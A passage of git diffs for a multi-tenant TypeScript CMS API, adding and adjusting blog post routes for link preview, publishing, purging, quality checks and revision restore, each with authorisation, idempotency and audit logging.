+  resolveAuthInputs
+} from "../../../../../../../modules/identity-access/application/access-guard";
+import { hashSessionToken } from "../../../../../../../lib/auth/session-token";
+import { fetchBlogPostById } from "../../../../../../../modules/blog-content/application/blog-post-directory";
+import { renderContentJsonToHtml } from "../../../../../../../modules/blog-content/domain/content-block-rendering";
+import { previewInternalTagLinksForContent } from "../../../../../../../modules/blog-content/application/internal-tag-link-rendering";
+import { resolveBlogAutoInternalTagLinksConfig } from "../../../../../../../modules/blog-content/domain/internal-tag-linking-config";
+
+const PREVIEW_GUARD = {
+  moduleKey: "blog_content",
+  activityCode: "internal_links",
+  action: "preview" as const
+};
+
+/**
+ * `GET /api/v1/blog/posts/{id}/internal-links/preview` (Issue #641) —
+ * read-only preview of which terms would be automatically linked in this
+ * post's rendered content BEFORE publishing (acceptance criterion "Preview
+ * endpoint/UI shows which terms will be linked before publish"). Runs the
+ * exact same `applyInternalTagLinksToHtml` engine the public `/news`/
+ * `/blog/{tenantCode}` routes use at render time (via
+ * `previewInternalTagLinksForContent`), against the post's CURRENT
+ * `content_json` regardless of its `status` (draft/review/scheduled all
+ * previewable — that's the point) — gallery/video media is rendered
+ * without R2 resolution (media verification is `content-quality-checklist`'s
+ * concern, Issue #640; this endpoint only cares about which text terms
+ * would be linked, and figure/figcaption/embed exclusion works identically
+ * whether or not a gallery image URL actually resolved).
+ *
+ * PORT ADAPTATION: awcms-mini built the preview's tag-archive link base path
+ * from `EffectivePublicRouteSettings.publicBasePath` (the `/news` family's
+ * own setting) — dropped in this port along with `/news` itself (see
+ * `blog-content/module.ts`'s description field). The one ported public
+ * route family is `/blog/{tenantCode}`, so this preview now looks up the
+ * tenant's own `tenant_code` and builds `/blog/{tenantCode}` directly —
+ * the preview link an editor sees here now matches EXACTLY what the public
+ * route renders, which is strictly more accurate than mini's own
+ * `/news`-based preview ever was for a tenant using the legacy family.
+ */
+type TenantCodeRow = { tenant_code: string };
+export const GET: APIRoute = async ({ request, cookies, params }) => {
+  const { tenantId, token } = resolveAuthInputs(request, cookies);
+  const postId = params.id;
+
+  if (!tenantId) {
+    return fail(400, "TENANT_REQUIRED", "Tenant header is required.");
+  }
+
+  if (!postId) {
+    return fail(400, "VALIDATION_ERROR", "Post id is required.");
+  }
+
+  if (!token) {
+    return fail(401, "AUTH_REQUIRED", "Authentication required.");
+  }
+
+  const sql = getDatabaseClient();
+  const tokenHash = hashSessionToken(token);
+  const now = new Date();
+
+  return withTenant(sql, tenantId, async (tx: Bun.SQL) => {
+    const auth = await authorizeInTransaction(
+      tx,
+      tenantId,
+      tokenHash,
+      now,
+      PREVIEW_GUARD
+    );
+
+    if (!auth.allowed) {
+      return auth.denied;
+    }
+
+    const post = await fetchBlogPostById(tx, tenantId, postId);
+
+    if (!post) {
+      return fail(404, "NOT_FOUND", "Blog post not found.");
+    }
+
+    const tenantRows = (await tx`
+      SELECT tenant_code FROM awcms_tenants WHERE id = ${tenantId}
+    `) as TenantCodeRow[];
+    const basePath = `/blog/${tenantRows[0]?.tenant_code ?? ""}`;
+    const contentHtml = renderContentJsonToHtml(post.contentJson);
+
+    const preview = await previewInternalTagLinksForContent(
+      tx,
+      tenantId,
+      contentHtml,
+      post.autoInternalTagLinksDisabled,
+      basePath
+    );
+
+    const deploymentConfig = resolveBlogAutoInternalTagLinksConfig();
+
+    return ok({
+      postId: post.id,
+      enabled: preview.enabled,
+      disabledReason: preview.disabledReason,
+      matches: preview.result.matches,
+      totalLinked: preview.result.matches.length,
+      maxPerPost: deploymentConfig.maxPerPost,
+      maxPerTag: deploymentConfig.maxPerTag
+    });
+  });
+};

--- a/src/pages/api/v1/blog/posts/[id]/publish.ts
+++ b/src/pages/api/v1/blog/posts/[id]/publish.ts
@@ -30,7 +30,7 @@ import {
   checklistBlockersToErrorDetails,
   evaluateContentQualityChecklistForContent
 } from "../../../../../../modules/blog-content/application/content-quality-checklist-gate";
-import { noopNewsMediaPortAdapter } from "../../../../../../modules/blog-content/application/news-media-port-noop-adapter";
+import { newsMediaPortAdapter } from "../../../../../../modules/news-portal/application/news-media-port-adapter";
 import { noopSocialPublishingPortAdapter } from "../../../../../../modules/blog-content/application/social-publishing-port-noop-adapter";
 
 // This route is the composition root that would wire `social_publishing`'s
@@ -148,7 +148,7 @@ export const POST: APIRoute = async ({ request, params, cookies, locals }) => {
       "post",
       post,
       termIds.length,
-      noopNewsMediaPortAdapter,
+      newsMediaPortAdapter,
       blogSettings.contentQualityChecklistPolicy,
       {
         socialPreviewFallback: {

--- a/src/pages/api/v1/blog/posts/[id]/publish.ts
+++ b/src/pages/api/v1/blog/posts/[id]/publish.ts
@@ -1,0 +1,248 @@
+import type { APIRoute } from "astro";
+
+import {
+  fail,
+  jsonResponse,
+  ok
+} from "../../../../../../modules/_shared/api-response";
+import { getDatabaseClient } from "../../../../../../lib/database/client";
+import { withTenant } from "../../../../../../lib/database/tenant-context";
+import {
+  authorizeInTransaction,
+  resolveAuthInputs
+} from "../../../../../../modules/identity-access/application/access-guard";
+import { hashSessionToken } from "../../../../../../lib/auth/session-token";
+import { log } from "../../../../../../lib/logging/logger";
+import { recordAuditEvent } from "../../../../../../modules/logging/application/audit-log";
+import {
+  computeRequestHash,
+  findIdempotencyRecord,
+  saveIdempotencyRecord
+} from "../../../../../../modules/_shared/idempotency";
+import {
+  fetchBlogPostById,
+  transitionBlogPostStatus
+} from "../../../../../../modules/blog-content/application/blog-post-directory";
+import { isValidStatusTransition } from "../../../../../../modules/blog-content/domain/post-status";
+import { fetchPostTermIds } from "../../../../../../modules/blog-content/application/blog-taxonomy-directory";
+import { fetchBlogSettings } from "../../../../../../modules/blog-content/application/blog-settings-directory";
+import {
+  checklistBlockersToErrorDetails,
+  evaluateContentQualityChecklistForContent
+} from "../../../../../../modules/blog-content/application/content-quality-checklist-gate";
+import { noopNewsMediaPortAdapter } from "../../../../../../modules/blog-content/application/news-media-port-noop-adapter";
+import { noopSocialPublishingPortAdapter } from "../../../../../../modules/blog-content/application/social-publishing-port-noop-adapter";
+
+// This route is the composition root that would wire `social_publishing`'s
+// real `SocialPublishingPort` into the manual publish action (trigger
+// `post_published`) once that module is ported. Neither `news_portal` nor
+// `social_publishing` is ported to this base yet, so both ports are the
+// no-op adapters — see their own headers for the full reasoning.
+const socialPublishingPort = noopSocialPublishingPortAdapter;
+
+const PUBLISH_GUARD = {
+  moduleKey: "blog_content",
+  activityCode: "posts",
+  action: "publish" as const
+};
+
+const IDEMPOTENCY_SCOPE = "blog_post_publish";
+
+/**
+ * `POST /api/v1/blog/posts/{id}/publish` (Issue #538). Straightforward
+ * permission gate — doc issue #538 §ABAC Rules: "Author may not publish
+ * unless granted `blog_content.posts.publish`" (no ownership carve-out
+ * like `PATCH .../{id}` has for `update`). High-risk mutation: requires
+ * `Idempotency-Key` (same replay/conflict semantics as
+ * `workflows/tasks/{id}/decisions.ts`).
+ */
+export const POST: APIRoute = async ({ request, params, cookies, locals }) => {
+  const { tenantId, token } = resolveAuthInputs(request, cookies);
+  const postId = params.id;
+
+  if (!tenantId) {
+    return fail(400, "TENANT_REQUIRED", "Tenant header is required.");
+  }
+
+  if (!postId) {
+    return fail(400, "VALIDATION_ERROR", "Post id is required.");
+  }
+
+  if (!token) {
+    return fail(401, "AUTH_REQUIRED", "Authentication required.");
+  }
+
+  const idempotencyKey = request.headers.get("idempotency-key");
+
+  if (!idempotencyKey) {
+    return fail(
+      400,
+      "IDEMPOTENCY_REQUIRED",
+      "Idempotency-Key header is required."
+    );
+  }
+
+  const requestHash = computeRequestHash({ postId, action: "publish" });
+  const sql = getDatabaseClient();
+  const tokenHash = hashSessionToken(token);
+  const now = new Date();
+  const correlationId = locals.correlationId;
+
+  return withTenant(sql, tenantId, async (tx) => {
+    const auth = await authorizeInTransaction(
+      tx,
+      tenantId,
+      tokenHash,
+      now,
+      PUBLISH_GUARD
+    );
+
+    if (!auth.allowed) {
+      return auth.denied;
+    }
+
+    const existingIdempotency = await findIdempotencyRecord(
+      tx,
+      tenantId,
+      IDEMPOTENCY_SCOPE,
+      idempotencyKey
+    );
+
+    if (existingIdempotency) {
+      if (existingIdempotency.requestHash !== requestHash) {
+        return fail(
+          409,
+          "IDEMPOTENCY_CONFLICT",
+          "Idempotency-Key was already used with a different request."
+        );
+      }
+
+      return jsonResponse(existingIdempotency.responseBody, {
+        status: existingIdempotency.responseStatus
+      });
+    }
+
+    const post = await fetchBlogPostById(tx, tenantId, postId);
+
+    if (!post) {
+      return fail(404, "RESOURCE_NOT_FOUND", "Blog post not found.");
+    }
+
+    if (!isValidStatusTransition(post.status, "published")) {
+      return fail(
+        409,
+        "INVALID_STATUS_TRANSITION",
+        `Cannot publish a post in status "${post.status}".`
+      );
+    }
+
+    // Issue #640: content quality checklist — server-side gate BEFORE the
+    // publish state transition, never relying on a client-side check alone.
+    // A no-op (`applicable: false`) when full-online R2-only mode isn't
+    // active for this tenant, same mode-gating precedent Issue #636 set.
+    const termIds = await fetchPostTermIds(tx, tenantId, postId);
+    const blogSettings = await fetchBlogSettings(tx, tenantId);
+    const checklist = await evaluateContentQualityChecklistForContent(
+      tx,
+      tenantId,
+      "post",
+      post,
+      termIds.length,
+      noopNewsMediaPortAdapter,
+      blogSettings.contentQualityChecklistPolicy,
+      {
+        socialPreviewFallback: {
+          tenantFallbackImageMediaId:
+            blogSettings.socialPreviewFallbackImageMediaId,
+          contentImageFallbackEnabled:
+            blogSettings.socialPreviewContentImageFallbackEnabled
+        }
+      }
+    );
+
+    if (!checklist.passed) {
+      await recordAuditEvent(tx, {
+        tenantId,
+        actorTenantUserId: auth.context.tenantUserId,
+        moduleKey: "blog_content",
+        action: "blog.post.publish_blocked_by_checklist",
+        resourceType: "blog_post",
+        resourceId: postId,
+        severity: "warning",
+        message: `Blog post publish blocked by content quality checklist: ${post.slug}.`,
+        attributes: {
+          blockedRuleIds: checklist.blockers.map((blocker) => blocker.ruleId)
+        },
+        correlationId
+      });
+
+      return fail(
+        422,
+        "CONTENT_QUALITY_CHECKLIST_BLOCKED",
+        "Publish is blocked by the content quality checklist.",
+        {},
+        checklistBlockersToErrorDetails(checklist)
+      );
+    }
+
+    const updated = await transitionBlogPostStatus(
+      tx,
+      tenantId,
+      postId,
+      "published"
+    );
+
+    if (!updated) {
+      return fail(404, "RESOURCE_NOT_FOUND", "Blog post not found.");
+    }
+
+    await recordAuditEvent(tx, {
+      tenantId,
+      actorTenantUserId: auth.context.tenantUserId,
+      moduleKey: "blog_content",
+      action: "blog.post.published",
+      resourceType: "blog_post",
+      resourceId: postId,
+      severity: "info",
+      message: `Blog post published: ${updated.slug}.`,
+      correlationId
+    });
+
+    log("info", "blog-content.post.published", {
+      correlationId,
+      tenantId,
+      moduleKey: "blog_content",
+      postId,
+      slug: updated.slug
+    });
+
+    await socialPublishingPort.onArticlePublished(
+      tx,
+      tenantId,
+      {
+        articleId: postId,
+        title: updated.title,
+        slug: updated.slug,
+        excerpt: updated.excerpt,
+        featuredMediaId: updated.featuredMediaId,
+        trigger: "post_published"
+      },
+      correlationId
+    );
+
+    const successResponse = ok({ ...updated, qualityChecklist: checklist });
+    const successBody = await successResponse.clone().json();
+
+    await saveIdempotencyRecord(
+      tx,
+      tenantId,
+      IDEMPOTENCY_SCOPE,
+      idempotencyKey,
+      requestHash,
+      200,
+      successBody
+    );
+
+    return successResponse;
+  });
+};

--- a/src/pages/api/v1/blog/posts/[id]/purge.ts
+++ b/src/pages/api/v1/blog/posts/[id]/purge.ts
@@ -1,0 +1,163 @@
+import type { APIRoute } from "astro";
+
+import {
+  fail,
+  jsonResponse,
+  ok
+} from "../../../../../../modules/_shared/api-response";
+import { getDatabaseClient } from "../../../../../../lib/database/client";
+import { withTenant } from "../../../../../../lib/database/tenant-context";
+import {
+  authorizeInTransaction,
+  resolveAuthInputs
+} from "../../../../../../modules/identity-access/application/access-guard";
+import { hashSessionToken } from "../../../../../../lib/auth/session-token";
+import { log } from "../../../../../../lib/logging/logger";
+import { recordAuditEvent } from "../../../../../../modules/logging/application/audit-log";
+import {
+  computeRequestHash,
+  findIdempotencyRecord,
+  saveIdempotencyRecord
+} from "../../../../../../modules/_shared/idempotency";
+import {
+  fetchBlogPostById,
+  purgeBlogPost
+} from "../../../../../../modules/blog-content/application/blog-post-directory";
+import { canPurgePost } from "../../../../../../modules/blog-content/domain/post-status";
+
+const PURGE_GUARD = {
+  moduleKey: "blog_content",
+  activityCode: "posts",
+  action: "purge" as const
+};
+
+const IDEMPOTENCY_SCOPE = "blog_post_purge";
+
+/**
+ * `POST /api/v1/blog/posts/{id}/purge` (Issue #538). Requires explicit
+ * `blog_content.posts.purge` permission. Doc issue #538 §ABAC Rules:
+ * "Purge is forbidden for published content unless archived or
+ * soft-deleted first" (`canPurgePost`) — `409 PURGE_NOT_ALLOWED` otherwise,
+ * not a raw constraint error. Hard `DELETE`; the post's
+ * `awcms_blog_post_terms` rows are cleaned up by
+ * `purgeBlogPost` itself. High-risk mutation: requires `Idempotency-Key`.
+ */
+export const POST: APIRoute = async ({ request, params, cookies, locals }) => {
+  const { tenantId, token } = resolveAuthInputs(request, cookies);
+  const postId = params.id;
+
+  if (!tenantId) {
+    return fail(400, "TENANT_REQUIRED", "Tenant header is required.");
+  }
+
+  if (!postId) {
+    return fail(400, "VALIDATION_ERROR", "Post id is required.");
+  }
+
+  if (!token) {
+    return fail(401, "AUTH_REQUIRED", "Authentication required.");
+  }
+
+  const idempotencyKey = request.headers.get("idempotency-key");
+
+  if (!idempotencyKey) {
+    return fail(
+      400,
+      "IDEMPOTENCY_REQUIRED",
+      "Idempotency-Key header is required."
+    );
+  }
+
+  const requestHash = computeRequestHash({ postId, action: "purge" });
+  const sql = getDatabaseClient();
+  const tokenHash = hashSessionToken(token);
+  const now = new Date();
+  const correlationId = locals.correlationId;
+
+  return withTenant(sql, tenantId, async (tx) => {
+    const auth = await authorizeInTransaction(
+      tx,
+      tenantId,
+      tokenHash,
+      now,
+      PURGE_GUARD
+    );
+
+    if (!auth.allowed) {
+      return auth.denied;
+    }
+
+    const existingIdempotency = await findIdempotencyRecord(
+      tx,
+      tenantId,
+      IDEMPOTENCY_SCOPE,
+      idempotencyKey
+    );
+
+    if (existingIdempotency) {
+      if (existingIdempotency.requestHash !== requestHash) {
+        return fail(
+          409,
+          "IDEMPOTENCY_CONFLICT",
+          "Idempotency-Key was already used with a different request."
+        );
+      }
+
+      return jsonResponse(existingIdempotency.responseBody, {
+        status: existingIdempotency.responseStatus
+      });
+    }
+
+    const post = await fetchBlogPostById(tx, tenantId, postId, {
+      includeDeleted: true
+    });
+
+    if (!post) {
+      return fail(404, "RESOURCE_NOT_FOUND", "Blog post not found.");
+    }
+
+    if (!canPurgePost(post.status, post.deletedAt)) {
+      return fail(
+        409,
+        "PURGE_NOT_ALLOWED",
+        "Post must be archived or soft-deleted before it can be purged."
+      );
+    }
+
+    await purgeBlogPost(tx, tenantId, postId);
+
+    await recordAuditEvent(tx, {
+      tenantId,
+      actorTenantUserId: auth.context.tenantUserId,
+      moduleKey: "blog_content",
+      action: "blog.post.purged",
+      resourceType: "blog_post",
+      resourceId: postId,
+      severity: "critical",
+      message: "Blog post purged.",
+      correlationId
+    });
+
+    log("info", "blog-content.post.purged", {
+      correlationId,
+      tenantId,
+      moduleKey: "blog_content",
+      postId
+    });
+
+    const successResponse = ok({ id: postId, status: "purged" });
+    const successBody = await successResponse.clone().json();
+
+    await saveIdempotencyRecord(
+      tx,
+      tenantId,
+      IDEMPOTENCY_SCOPE,
+      idempotencyKey,
+      requestHash,
+      200,
+      successBody
+    );
+
+    return successResponse;
+  });
+};

--- a/src/pages/api/v1/blog/posts/[id]/quality-checklist.ts
+++ b/src/pages/api/v1/blog/posts/[id]/quality-checklist.ts
@@ -1,0 +1,96 @@
+import type { APIRoute } from "astro";
+
+import { fail, ok } from "../../../../../../modules/_shared/api-response";
+import { getDatabaseClient } from "../../../../../../lib/database/client";
+import { withTenant } from "../../../../../../lib/database/tenant-context";
+import {
+  authorizeInTransaction,
+  resolveAuthInputs
+} from "../../../../../../modules/identity-access/application/access-guard";
+import { hashSessionToken } from "../../../../../../lib/auth/session-token";
+import { fetchBlogPostById } from "../../../../../../modules/blog-content/application/blog-post-directory";
+import { fetchPostTermIds } from "../../../../../../modules/blog-content/application/blog-taxonomy-directory";
+import { fetchBlogSettings } from "../../../../../../modules/blog-content/application/blog-settings-directory";
+import { evaluateContentQualityChecklistForContent } from "../../../../../../modules/blog-content/application/content-quality-checklist-gate";
+import { noopNewsMediaPortAdapter } from "../../../../../../modules/blog-content/application/news-media-port-noop-adapter";
+
+const READ_GUARD = {
+  moduleKey: "blog_content",
+  activityCode: "posts",
+  action: "read" as const
+};
+
+/**
+ * `GET /api/v1/blog/posts/{id}/quality-checklist` (Issue #640). Read-only
+ * preview of the content quality checklist for the admin post editor —
+ * acceptance criterion "Checklist is available in admin post/page editor."
+ * Same read permission as `GET /api/v1/blog/posts/{id}` (no separate
+ * permission needed, this exposes no new capability beyond reading the
+ * post itself). Never mutates anything; the actual server-side enforcement
+ * happens at `POST .../publish` and `POST .../schedule`, which run the
+ * exact same evaluator (`content-quality-checklist-gate.ts`) — this
+ * endpoint exists purely so the editor can show the same result BEFORE the
+ * author attempts either action.
+ */
+export const GET: APIRoute = async ({ request, params, cookies }) => {
+  const { tenantId, token } = resolveAuthInputs(request, cookies);
+  const postId = params.id;
+
+  if (!tenantId) {
+    return fail(400, "TENANT_REQUIRED", "Tenant header is required.");
+  }
+
+  if (!postId) {
+    return fail(400, "VALIDATION_ERROR", "Post id is required.");
+  }
+
+  if (!token) {
+    return fail(401, "AUTH_REQUIRED", "Authentication required.");
+  }
+
+  const sql = getDatabaseClient();
+  const tokenHash = hashSessionToken(token);
+  const now = new Date();
+
+  return withTenant(sql, tenantId, async (tx) => {
+    const auth = await authorizeInTransaction(
+      tx,
+      tenantId,
+      tokenHash,
+      now,
+      READ_GUARD
+    );
+
+    if (!auth.allowed) {
+      return auth.denied;
+    }
+
+    const post = await fetchBlogPostById(tx, tenantId, postId);
+
+    if (!post) {
+      return fail(404, "RESOURCE_NOT_FOUND", "Blog post not found.");
+    }
+
+    const termIds = await fetchPostTermIds(tx, tenantId, postId);
+    const blogSettings = await fetchBlogSettings(tx, tenantId);
+    const checklist = await evaluateContentQualityChecklistForContent(
+      tx,
+      tenantId,
+      "post",
+      post,
+      termIds.length,
+      noopNewsMediaPortAdapter,
+      blogSettings.contentQualityChecklistPolicy,
+      {
+        socialPreviewFallback: {
+          tenantFallbackImageMediaId:
+            blogSettings.socialPreviewFallbackImageMediaId,
+          contentImageFallbackEnabled:
+            blogSettings.socialPreviewContentImageFallbackEnabled
+        }
+      }
+    );
+
+    return ok({ postId, qualityChecklist: checklist });
+  });
+};

--- a/src/pages/api/v1/blog/posts/[id]/quality-checklist.ts
+++ b/src/pages/api/v1/blog/posts/[id]/quality-checklist.ts
@@ -12,7 +12,7 @@ import { fetchBlogPostById } from "../../../../../../modules/blog-content/applic
 import { fetchPostTermIds } from "../../../../../../modules/blog-content/application/blog-taxonomy-directory";
 import { fetchBlogSettings } from "../../../../../../modules/blog-content/application/blog-settings-directory";
 import { evaluateContentQualityChecklistForContent } from "../../../../../../modules/blog-content/application/content-quality-checklist-gate";
-import { noopNewsMediaPortAdapter } from "../../../../../../modules/blog-content/application/news-media-port-noop-adapter";
+import { newsMediaPortAdapter } from "../../../../../../modules/news-portal/application/news-media-port-adapter";
 
 const READ_GUARD = {
   moduleKey: "blog_content",
@@ -79,7 +79,7 @@ export const GET: APIRoute = async ({ request, params, cookies }) => {
       "post",
       post,
       termIds.length,
-      noopNewsMediaPortAdapter,
+      newsMediaPortAdapter,
       blogSettings.contentQualityChecklistPolicy,
       {
         socialPreviewFallback: {

--- a/src/pages/api/v1/blog/posts/[id]/restore.ts
+++ b/src/pages/api/v1/blog/posts/[id]/restore.ts
@@ -1,0 +1,161 @@
+import type { APIRoute } from "astro";
+
+import {
+  fail,
+  jsonResponse,
+  ok
+} from "../../../../../../modules/_shared/api-response";
+import { getDatabaseClient } from "../../../../../../lib/database/client";
+import { withTenant } from "../../../../../../lib/database/tenant-context";
+import {
+  authorizeInTransaction,
+  resolveAuthInputs
+} from "../../../../../../modules/identity-access/application/access-guard";
+import { hashSessionToken } from "../../../../../../lib/auth/session-token";
+import { log } from "../../../../../../lib/logging/logger";
+import { recordAuditEvent } from "../../../../../../modules/logging/application/audit-log";
+import {
+  computeRequestHash,
+  findIdempotencyRecord,
+  saveIdempotencyRecord
+} from "../../../../../../modules/_shared/idempotency";
+import {
+  fetchBlogPostById,
+  restoreBlogPost
+} from "../../../../../../modules/blog-content/application/blog-post-directory";
+import { canRestorePost } from "../../../../../../modules/blog-content/domain/post-status";
+
+const RESTORE_GUARD = {
+  moduleKey: "blog_content",
+  activityCode: "posts",
+  action: "restore" as const
+};
+
+const IDEMPOTENCY_SCOPE = "blog_post_restore";
+
+/** `POST /api/v1/blog/posts/{id}/restore` (Issue #538). Requires explicit `blog_content.posts.restore` permission. 404 if the post is not currently soft-deleted. High-risk mutation: requires `Idempotency-Key`. */
+export const POST: APIRoute = async ({ request, params, cookies, locals }) => {
+  const { tenantId, token } = resolveAuthInputs(request, cookies);
+  const postId = params.id;
+
+  if (!tenantId) {
+    return fail(400, "TENANT_REQUIRED", "Tenant header is required.");
+  }
+
+  if (!postId) {
+    return fail(400, "VALIDATION_ERROR", "Post id is required.");
+  }
+
+  if (!token) {
+    return fail(401, "AUTH_REQUIRED", "Authentication required.");
+  }
+
+  const idempotencyKey = request.headers.get("idempotency-key");
+
+  if (!idempotencyKey) {
+    return fail(
+      400,
+      "IDEMPOTENCY_REQUIRED",
+      "Idempotency-Key header is required."
+    );
+  }
+
+  const requestHash = computeRequestHash({ postId, action: "restore" });
+  const sql = getDatabaseClient();
+  const tokenHash = hashSessionToken(token);
+  const now = new Date();
+  const correlationId = locals.correlationId;
+
+  return withTenant(sql, tenantId, async (tx) => {
+    const auth = await authorizeInTransaction(
+      tx,
+      tenantId,
+      tokenHash,
+      now,
+      RESTORE_GUARD
+    );
+
+    if (!auth.allowed) {
+      return auth.denied;
+    }
+
+    const existingIdempotency = await findIdempotencyRecord(
+      tx,
+      tenantId,
+      IDEMPOTENCY_SCOPE,
+      idempotencyKey
+    );
+
+    if (existingIdempotency) {
+      if (existingIdempotency.requestHash !== requestHash) {
+        return fail(
+          409,
+          "IDEMPOTENCY_CONFLICT",
+          "Idempotency-Key was already used with a different request."
+        );
+      }
+
+      return jsonResponse(existingIdempotency.responseBody, {
+        status: existingIdempotency.responseStatus
+      });
+    }
+
+    const post = await fetchBlogPostById(tx, tenantId, postId, {
+      includeDeleted: true
+    });
+
+    if (!post || !canRestorePost(post.deletedAt)) {
+      return fail(
+        404,
+        "RESOURCE_NOT_FOUND",
+        "Blog post not found or not currently soft-deleted."
+      );
+    }
+
+    const updated = await restoreBlogPost(
+      tx,
+      tenantId,
+      auth.context.tenantUserId,
+      postId
+    );
+
+    if (!updated) {
+      return fail(404, "RESOURCE_NOT_FOUND", "Blog post not found.");
+    }
+
+    await recordAuditEvent(tx, {
+      tenantId,
+      actorTenantUserId: auth.context.tenantUserId,
+      moduleKey: "blog_content",
+      action: "blog.post.restored",
+      resourceType: "blog_post",
+      resourceId: postId,
+      severity: "warning",
+      message: `Blog post restored: ${updated.slug}.`,
+      correlationId
+    });
+
+    log("info", "blog-content.post.restored", {
+      correlationId,
+      tenantId,
+      moduleKey: "blog_content",
+      postId,
+      slug: updated.slug
+    });
+
+    const successResponse = ok(updated);
+    const successBody = await successResponse.clone().json();
+
+    await saveIdempotencyRecord(
+      tx,
+      tenantId,
+      IDEMPOTENCY_SCOPE,
+      idempotencyKey,
+      requestHash,
+      200,
+      successBody
+    );
+
+    return successResponse;
+  });
+};

--- a/src/pages/api/v1/blog/posts/[id]/revisions/[revisionId].ts
+++ b/src/pages/api/v1/blog/posts/[id]/revisions/[revisionId].ts
@@ -1,0 +1,88 @@
+import type { APIRoute } from "astro";
+
+import { fail, ok } from "../../../../../../../modules/_shared/api-response";
+import { getDatabaseClient } from "../../../../../../../lib/database/client";
+import { withTenant } from "../../../../../../../lib/database/tenant-context";
+import {
+  authorizeInTransaction,
+  resolveAuthInputs
+} from "../../../../../../../modules/identity-access/application/access-guard";
+import { hashSessionToken } from "../../../../../../../lib/auth/session-token";
+import { fetchBlogPostById } from "../../../../../../../modules/blog-content/application/blog-post-directory";
+import { fetchBlogRevisionById } from "../../../../../../../modules/blog-content/application/blog-revision-directory";
+
+const READ_GUARD = {
+  moduleKey: "blog_content",
+  activityCode: "revisions",
+  action: "read" as const
+};
+
+/**
+ * `GET /api/v1/blog/posts/{id}/revisions/{revisionId}` (Issue #541).
+ * Requires `blog_content.revisions.read`. 404 (not 403) if the revision
+ * exists but belongs to a different post/tenant — `fetchBlogRevisionById`
+ * scopes on `resource_id` in addition to `id`, so cross-tenant/cross-post
+ * access is indistinguishable from "doesn't exist", same convention every
+ * other resource lookup in this module already uses.
+ */
+export const GET: APIRoute = async ({ request, params, cookies }) => {
+  const { tenantId, token } = resolveAuthInputs(request, cookies);
+  const postId = params.id;
+  const revisionId = params.revisionId;
+
+  if (!tenantId) {
+    return fail(400, "TENANT_REQUIRED", "Tenant header is required.");
+  }
+
+  if (!postId || !revisionId) {
+    return fail(
+      400,
+      "VALIDATION_ERROR",
+      "Post id and revision id are required."
+    );
+  }
+
+  if (!token) {
+    return fail(401, "AUTH_REQUIRED", "Authentication required.");
+  }
+
+  const sql = getDatabaseClient();
+  const tokenHash = hashSessionToken(token);
+  const now = new Date();
+
+  return withTenant(sql, tenantId, async (tx) => {
+    const auth = await authorizeInTransaction(
+      tx,
+      tenantId,
+      tokenHash,
+      now,
+      READ_GUARD
+    );
+
+    if (!auth.allowed) {
+      return auth.denied;
+    }
+
+    const post = await fetchBlogPostById(tx, tenantId, postId, {
+      includeDeleted: true
+    });
+
+    if (!post) {
+      return fail(404, "RESOURCE_NOT_FOUND", "Blog post not found.");
+    }
+
+    const revision = await fetchBlogRevisionById(
+      tx,
+      tenantId,
+      "post",
+      postId,
+      revisionId
+    );
+
+    if (!revision) {
+      return fail(404, "RESOURCE_NOT_FOUND", "Revision not found.");
+    }
+
+    return ok(revision);
+  });
+};

--- a/src/pages/api/v1/blog/posts/[id]/revisions/[revisionId]/restore.ts
+++ b/src/pages/api/v1/blog/posts/[id]/revisions/[revisionId]/restore.ts
@@ -28,7 +28,7 @@ import {
 } from "../../../../../../../../modules/blog-content/application/blog-revision-directory";
 import { validateNewsMediaReferencesForFullOnlineR2Mode } from "../../../../../../../../modules/blog-content/application/news-media-reference-gate";
 import { validateVideoNewsThumbnailReferencesForFullOnlineR2Mode } from "../../../../../../../../modules/blog-content/application/video-news-thumbnail-reference-gate";
-import { noopNewsMediaPortAdapter } from "../../../../../../../../modules/blog-content/application/news-media-port-noop-adapter";
+import { newsMediaPortAdapter } from "../../../../../../../../modules/news-portal/application/news-media-port-adapter";
 import { validateAndNormalizeContentJsonVideoBlocks } from "../../../../../../../../modules/blog-content/domain/video-news-block-validation";
 
 const RESTORE_GUARD = {
@@ -159,7 +159,7 @@ export const POST: APIRoute = async ({ request, params, cookies, locals }) => {
           featuredMediaId: undefined,
           contentJson: revision.contentJson
         },
-        noopNewsMediaPortAdapter
+        newsMediaPortAdapter
       );
 
     if (!mediaReferenceValidation.valid) {
@@ -199,7 +199,7 @@ export const POST: APIRoute = async ({ request, params, cookies, locals }) => {
         tx,
         tenantId,
         normalizedContentJson,
-        noopNewsMediaPortAdapter
+        newsMediaPortAdapter
       );
 
     if (!videoThumbnailValidation.valid) {

--- a/src/pages/api/v1/blog/posts/[id]/revisions/[revisionId]/restore.ts
+++ b/src/pages/api/v1/blog/posts/[id]/revisions/[revisionId]/restore.ts
@@ -1,0 +1,277 @@
+import type { APIRoute } from "astro";
+
+import {
+  fail,
+  jsonResponse,
+  ok
+} from "../../../../../../../../modules/_shared/api-response";
+import { getDatabaseClient } from "../../../../../../../../lib/database/client";
+import { withTenant } from "../../../../../../../../lib/database/tenant-context";
+import {
+  authorizeInTransaction,
+  resolveAuthInputs
+} from "../../../../../../../../modules/identity-access/application/access-guard";
+import { hashSessionToken } from "../../../../../../../../lib/auth/session-token";
+import { recordAuditEvent } from "../../../../../../../../modules/logging/application/audit-log";
+import {
+  computeRequestHash,
+  findIdempotencyRecord,
+  saveIdempotencyRecord
+} from "../../../../../../../../modules/_shared/idempotency";
+import {
+  fetchBlogPostById,
+  updateBlogPost
+} from "../../../../../../../../modules/blog-content/application/blog-post-directory";
+import {
+  createBlogRevision,
+  fetchBlogRevisionById
+} from "../../../../../../../../modules/blog-content/application/blog-revision-directory";
+import { validateNewsMediaReferencesForFullOnlineR2Mode } from "../../../../../../../../modules/blog-content/application/news-media-reference-gate";
+import { validateVideoNewsThumbnailReferencesForFullOnlineR2Mode } from "../../../../../../../../modules/blog-content/application/video-news-thumbnail-reference-gate";
+import { noopNewsMediaPortAdapter } from "../../../../../../../../modules/blog-content/application/news-media-port-noop-adapter";
+import { validateAndNormalizeContentJsonVideoBlocks } from "../../../../../../../../modules/blog-content/domain/video-news-block-validation";
+
+const RESTORE_GUARD = {
+  moduleKey: "blog_content",
+  activityCode: "revisions",
+  action: "restore" as const
+};
+
+const IDEMPOTENCY_SCOPE = "blog_revision_restore";
+
+/**
+ * `POST /api/v1/blog/posts/{id}/revisions/{revisionId}/restore` (Issue
+ * #541). Requires explicit `blog_content.revisions.restore` permission
+ * (doc issue #541 §Revision Rules: "restore requires explicit permission").
+ * Restoring never overwrites revision history — it writes the target
+ * revision's content back onto the live post (`updateBlogPost`) and then
